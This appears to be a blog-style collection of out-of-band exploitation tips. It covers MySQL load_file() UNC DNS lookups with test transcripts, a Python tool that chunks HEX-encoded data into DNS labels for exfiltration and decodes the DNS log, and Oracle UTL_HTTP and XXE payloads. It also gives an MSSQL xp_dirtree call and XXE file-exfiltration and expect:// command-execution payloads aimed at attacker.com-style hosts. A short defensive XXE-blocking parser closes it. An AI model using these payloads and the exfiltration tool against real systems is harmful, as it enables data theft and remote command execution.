Out of Band Exploit Tips

MySQL

For a long time I have made no progress in MySQL beyond injection, and lately even my injection has got rusty. Then I noticed people kept bringing up OOB (out of band), so I reproduced it in MySQL.
Tested in each of the environments below
with the same payload: select load_file('\\\\test.xxxx.dnslog.com\\a.txt')
A note for the record: MySQL has a system variable secure_file_priv. When it is empty (not NULL), load_file() can read files and INTO OUTFILE can write them anywhere; when it is NULL both are disabled entirely, and when it names a directory they are confined to that directory. The default was empty before 5.5.53; from 5.5.53 on the default is platform-dependent and is NULL in many builds.

os: windows
version: 5.5.53
Result: success (the lookup shows up in the DNS log even though load_file() itself returns NULL)
+-----------+
| version() |
+-----------+
| 5.5.53 |
+-----------+
1 row in set (0.00 sec)
mysql> show global variables like 'secure_fi%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_file_priv | |
+------------------+-------+
1 row in set (0.00 sec)
mysql> select load_file('\\\\\testdnsoobmysql.xxx.xxx.xxx\\a.txt');
+-----------------------------------------------------------+
| load_file('\\\\\testdnsoobmysql.xxx.xxx.xxx\\a.txt') |
+-----------------------------------------------------------+
| NULL |
+-----------------------------------------------------------+
1 row in set (21.60 sec)
os: linux
version: 10.1.22-MariaDB
Result: failure
MariaDB [(none)]> select load_file('\\\\testdns.xxxx.xxx.xxx\\a.txt');
+--------------------------------------------------+
| load_file('\\\\testdns.xxxx.xxx.xxx\\a.txt') |
+--------------------------------------------------+
| NULL |
+--------------------------------------------------+
os: linux
version: 5.1.73
Result: failure
mysql [(none)]> select load_file('\\\\testdns.xxxx.xxx.xxx\\a.txt');
+--------------------------------------------------+
| load_file('\\\\testdns.xxxx.xxx.xxx\\a.txt') |
+--------------------------------------------------+
| NULL |
+--------------------------------------------------+

I am not sure whether my test method is at fault, but in any case the OOB attack failed on Linux.
So the scenario where this OOB trick applies is MySQL on Windows with secure_file_priv=''. The reason is the UNC path: on Windows, load_file() hands '\\host\share\file' to the OS, which resolves the host name (and attempts an SMB connection) before the function gives up and returns NULL, so the DNS query reaches the attacker's name server; on Linux the same string is just a non-existent local path and no lookup ever happens. The long execution time (21.60 sec) in the Windows run is that resolution and connection attempt timing out.
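As an added example (not part of the original post), here is how the Windows UNC trick above turns into actual data exfiltration instead of a single "is it vulnerable" ping. The value to steal is HEX()-encoded on the server, cut into 60-character pieces so that each piece fits in one DNS label (63 bytes maximum), prefixed with an index label so the pieces can be reordered, and then reassembled by the attacker from the DNS log. The domain x.dnslog.example, the log line format and the @@datadir value are all made up for the example; the SQL is ordinary MySQL string functions.

```python
import re
from typing import Iterable, List

CHUNK = 60  # hex characters per DNS label; a single label may hold at most 63 bytes


def mysql_dns_payloads(expr: str, domain: str, max_chunks: int) -> List[str]:
    """Build one LOAD_FILE() query per chunk of HEX(expr).

    The UNC host name is <index>.<hex chunk>.<domain>.  On Windows the server
    resolves that name (and tries SMB) before LOAD_FILE() gives up and returns
    NULL, so the name lands in the attacker's DNS log.  Chunks past the end of
    the data yield the literal label 'end' instead of an empty label.
    """
    template = (
        r"SELECT LOAD_FILE(CONCAT('\\\\', '%d', '.', "
        r"IFNULL(NULLIF(SUBSTRING(HEX(%s), %d, %d), ''), 'end'), "
        r"'.', '%s', '\\a.txt'))"
    )
    queries = []
    for i in range(max_chunks):
        start = i * CHUNK + 1          # SUBSTRING() positions are 1-based
        queries.append(template % (i, expr, start, CHUNK, domain))
    return queries


def decode_dns_log(lines: Iterable[str], domain: str) -> str:
    """Reassemble the exfiltrated value from DNS log lines.

    Lines may arrive in any order (resolvers retry and reorder), so the index
    label decides the order; the 'end' marker and unrelated lookups are ignored.
    """
    pattern = re.compile(
        r"(?<![\w.])(\d+)\.([0-9A-Fa-f]+)\." + re.escape(domain) + r"(?![\w.])"
    )
    chunks = {}
    for line in lines:
        m = pattern.search(line)
        if m:
            chunks[int(m.group(1))] = m.group(2)
    hexdata = "".join(chunks[i] for i in sorted(chunks))
    return bytes.fromhex(hexdata).decode("utf-8", "replace")


# --- constructed sample data (made up for this example, not captured traffic) ---

DOMAIN = "x.dnslog.example"
DATADIR = "C:\\ProgramData\\MySQL\\MySQL Server 5.5\\Data\\"   # made-up @@datadir


def constructed_dns_log(secret: str, domain: str) -> List[str]:
    """Fake what the DNS log would contain after the payloads above ran,
    with the lookups deliberately logged in reverse order."""
    hexdata = secret.encode("utf-8").hex().upper()          # mimics MySQL HEX()
    labels = [hexdata[i:i + CHUNK] for i in range(0, len(hexdata), CHUNK)] + ["end"]
    lines = []
    for n, idx in enumerate(reversed(range(len(labels)))):
        lines.append("2017-06-01 12:00:%02d query A %d.%s.%s" % (n, idx, labels[idx], domain))
    return lines


if __name__ == "__main__":
    for q in mysql_dns_payloads("@@datadir", DOMAIN, 3):
        print(q)
    print(decode_dns_log(constructed_dns_log(DATADIR, DOMAIN), DOMAIN))
```

Two practical points the code does not show: the DNS log only receives names that reach the authoritative server, so if a resolver on the path caches a name, re-running the same chunk query will not produce a second log line (add a random nonce label when you need to re-send), and the total host name must stay under 253 bytes, which is why the chunk size is kept well below what the index label and domain leave over.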

One more thing worth noting separately: the mysql client can execute system commands (the system / \! command), but only on Unix, as the official manual states. Besides the OS restriction there is another limitation: the command runs on the machine where the mysql client is running, not on the server, so over a remote login it gives you nothing on the server side.

ORACLE

The Oracle payloads collected so far are the following (note: gathered from the web and untested; no guarantee of correctness or of the scenarios they apply to):

-- #1. blind XXE through extractvalue(): the parser fetches the external DTD
(select extractvalue(xmltype(
'<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [
<!ENTITY % glrvh SYSTEM "http://fcvlarzebywms16gggoy7tvo.burpcollaborator.net/">%glrvh;]>'
),'/l') from dual)
-- #2. direct HTTP request from the database (needs execute on UTL_HTTP and the network ACL to allow it)
SELECT UTL_HTTP.request('http://test.attacker.com/'||(SELECT user FROM DUAL)) FROM DUAL

MSSQL

Likewise unverified; kept here only as a record

EXEC master..xp_dirtree '\\test.attacker.com\' --

XML External Entity (XXE)

XML offers two ways to do OOB; strictly speaking they are ways of getting output back from a blind XXE. Beyond those there is also a way to execute commands through XXE, but its preconditions are restrictive.

#1. PoC
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [<!ENTITY % file SYSTEM "http://xxx.xxx.xx.dnslog.com"> %file;]>
# If a lookup shows up in the DNS log, the parser fetches external DTDs and you can move on to the next step
#2. Exploit
#2.1 Document sent by the client
<!DOCTYPE data [
<!ENTITY % file SYSTEM
"file:///etc/lsb-release">
<!ENTITY % dtd SYSTEM
"http://attacker.com/evil.dtd">
%dtd;
]>
<data>&send;</data>
# 2.2 attacker.com/evil.dtd
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?collect=%file;'>">
%all;
# The nested %file; reference has to live in the external DTD: the internal subset does not allow parameter-entity references inside a markup declaration.
# File contents with newlines or characters that are not URL-safe break the request, so the target file must be small and single-line or be encoded first (e.g. via php://filter on PHP).
#3. Command execution
# Requires PHP with the expect extension installed
<!DOCTYPE root [
<!ENTITY cmd SYSTEM "expect://id">
]>
<dir>
<file>&cmd;</file>
</dir>
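To close the loop on the defensive side, the following example (added here, not part of the original post) shows how a Python service would refuse all three of the documents above at the parser level. It uses the stdlib expat bindings and raises on any DOCTYPE, any entity declaration, or any external entity reference, which is the same rule defusedxml applies: the document is rejected before any entity could be expanded or any URL fetched. The three payloads are adapted from the PoCs above with made-up host names (probe.dnslog.example, attacker.example); the benign document is constructed too.

```python
import xml.parsers.expat as expat
from typing import List, Tuple


class XXEBlocked(Exception):
    """Raised when untrusted XML tries to use a DTD, an entity or an external reference."""


def parse_untrusted_xml(data: bytes, forbid_dtd: bool = True) -> Tuple[str, str]:
    """Parse XML that came from a client and return (root element name, text content).

    Every DTD-related expat callback raises, so the document is rejected before
    any entity could be expanded or any URL fetched.  With forbid_dtd=False a bare
    <!DOCTYPE> is tolerated, but entity declarations are still refused.
    """
    parser = expat.ParserCreate()
    root: List[str] = []
    texts: List[str] = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if forbid_dtd:
            raise XXEBlocked("DOCTYPE not allowed in untrusted input")

    def on_entity_decl(name, is_parameter_entity, value, base, sysid, pubid, notation):
        kind = "parameter" if is_parameter_entity else "general"
        raise XXEBlocked("%s entity %r declared (system id %r)" % (kind, name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        # Reached only if a declaration slipped through; refuses to fetch anything.
        raise XXEBlocked("external entity reference to %r" % sysid)

    def on_start(name, attrs):
        if not root:
            root.append(name)

    def on_text(text):
        texts.append(text)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)
    return root[0], "".join(texts).strip()


def is_blocked(data: bytes, forbid_dtd: bool = True) -> bool:
    """True if parse_untrusted_xml() rejects the document as an XXE attempt."""
    try:
        parse_untrusted_xml(data, forbid_dtd)
    except XXEBlocked:
        return True
    return False


# --- constructed payloads, adapted from the PoCs above with made-up hosts ----

STAGE1_PROBE = (b'<?xml version="1.0" encoding="UTF-8"?>'
                b'<!DOCTYPE data [<!ENTITY % file SYSTEM "http://probe.dnslog.example/"> %file;]>'
                b'<data/>')

STAGE2_EXFIL = (b'<!DOCTYPE data [<!ENTITY % file SYSTEM "file:///etc/lsb-release">'
                b'<!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd;]>'
                b'<data>&send;</data>')

EXPECT_RCE = (b'<!DOCTYPE root [<!ENTITY cmd SYSTEM "expect://id">]>'
              b'<dir><file>&cmd;</file></dir>')

BENIGN = b'<?xml version="1.0"?><dir><file>report.txt</file></dir>'


if __name__ == "__main__":
    for label, doc in [("probe", STAGE1_PROBE), ("exfil", STAGE2_EXFIL),
                       ("expect", EXPECT_RCE), ("benign", BENIGN)]:
        print(label, "blocked" if is_blocked(doc) else parse_untrusted_xml(doc))
```

The point of hooking the declaration callbacks rather than inspecting the text for the string "ENTITY" is that the parser sees the declaration exactly where it matters, after encoding and whitespace handling, so there is nothing to obfuscate around; refusing the DOCTYPE outright is the simplest policy for APIs that never legitimately receive a DTD.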

References

https://www.acunetix.com/blog/articles/blind-out-of-band-sql-injection-vulnerability-testing-added-acumonitor/
http://releases.portswigger.net/2015/09/1627.html
https://www.exploit-db.com/docs/41273.pdf
https://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf
https://www.acunetix.com/blog/articles/band-xml-external-entity-oob-xxe/
